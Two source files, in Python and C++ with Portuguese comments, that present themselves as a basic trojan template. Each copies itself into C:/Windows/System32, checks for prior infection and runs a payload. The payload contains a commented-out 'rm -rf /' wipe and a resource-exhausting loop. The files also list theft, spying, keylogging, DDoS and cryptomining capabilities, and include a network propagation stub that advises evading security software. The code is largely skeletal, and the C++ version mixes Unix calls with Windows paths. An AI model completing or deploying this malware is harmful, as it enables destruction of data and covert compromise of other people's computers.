File: hacker/00-trojan.py
"""

Exemplo básico de trojan em python

"""
import os
import shutil

def payload():
    # Aqui você pode escrever o código que deseja executar no computador infectado
    
    # Exemplos:

    # excluir todos os arquivos do sistema:
    #os.system("rm -rf /")

    # criar um loop infinito para consumir todos os recursos do sistema:
    # while True:
    #    pass

    # Opções:
    """ 
    Roubo de informações:
    Pode ser programado para coletar informações confidenciais, como senhas, dados bancários, informações pessoais, histórico de navegação, capturas de tela e registros de digitação.

    Espionagem:
    Pode ativar a câmera e o microfone do computador infectado para gravar secretamente vídeos ou áudios de um usuário.
    
    Controle remoto:
    Pode-se implementar um mecanismo de controle remoto que permite assumir o controle do computador infectado, executando comandos, transferindo arquivos e obtendo acesso a outros dispositivos na rede.
    
    Keylogging:
    Pode registrar todas as teclas digitadas, permitindo captura de senhas, mensagens privadas e outras informações confidenciais.

    Captura de tela:
    Pode tirar capturas de tela em intervalos regulares e enviá-las, permitindo a visualização da atividade do usuário.

    Ataques DDoS:
    Pode ser programado para participar de ataques de negação de serviço distribuídos (DDoS), onde vários computadores infectados são usados para sobrecarregar um servidor ou uma rede, tornando-o inacessível.
    
    Propagação em redes sociais:
    Pode roubar credenciais de acesso a redes sociais e propagar-se automaticamente através de mensagens ou postagens falsas, infectando outros usuários.
    
    Criptomineração:
    Pode utilizar os recursos do computador infectado para minerar criptomoedas.
    """

def main():
    # Aqui está a função principal que será executada no computador infectado

    # Primeiro, verificamos se o computador já foi infectado antes de propagar
    if os.path.exists("C:/Windows/System32/trojan.exe"):
        return

    # Em seguida, copiamos o arquivo do trojan para o sistema
    shutil.copy2("trojan.exe", "C:/Windows/System32/trojan.exe")

    # Chamamos a função payload para executar nosso código malicioso
    payload()

def propagate():
    # Essa função pode ser usada para propagar o trojan para outros computadores na rede

    # Por exemplo, você pode criar uma rotina que escaneia os IPs da rede local e tenta
    # se conectar remotamente aos computadores para copiar e executar o trojan

    # Lembre-se de ser sigiloso e evitar detecção pelos sistemas de segurança

    pass

if __name__ == "__main__":
    # Aqui chamamos a função principal para iniciar a infecção
    main()

File: hacker/00-trojan.cpp
/*

Exemplo básico de trojan em c++

*/

#include <iostream>
#include <fstream>
#include <cstdlib>
#include <cstring>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>

using namespace std;

void payload() {
    // Aqui você pode escrever o código que deseja executar no computador infectado
    
    // Exemplos:

    // Excluir todos os arquivos do sistema
    // system("rm -rf /");

    // Criar um loop infinito para consumir todos os recursos do sistema
    // while (true) {}
}

void mainFunction() {
    // Aqui está a função principal que será executada no computador infectado

    // Primeiro, verificamos se o computador já foi infectado antes de propagar
    if (access("C:/Windows/System32/trojan.exe", F_OK) != -1) {
        return;
    }

    // Em seguida, copiamos o arquivo do trojan para o sistema
    if (system("cp trojan.exe C:/Windows/System32/trojan.exe") == -1) {
        cout << "Falha ao copiar o arquivo do trojan\n";
        return;
    }

    // Chamamos a função payload para executar nosso código malicioso
    payload();
}

void propagate() {
    // Essa função pode ser usada para propagar o trojan para outros computadores na rede

    // Por exemplo, você pode criar uma rotina que escaneia os IPs da rede local e tenta
    // se conectar remotamente aos computadores para copiar e executar o trojan

    // Lembre-se de ser sigiloso e evitar detecção pelos sistemas de segurança

    // Implemente a lógica de propagação aqui
}

int main() {
    // Aqui chamamos a função principal para iniciar a infecção
    mainFunction();

    return 0;
}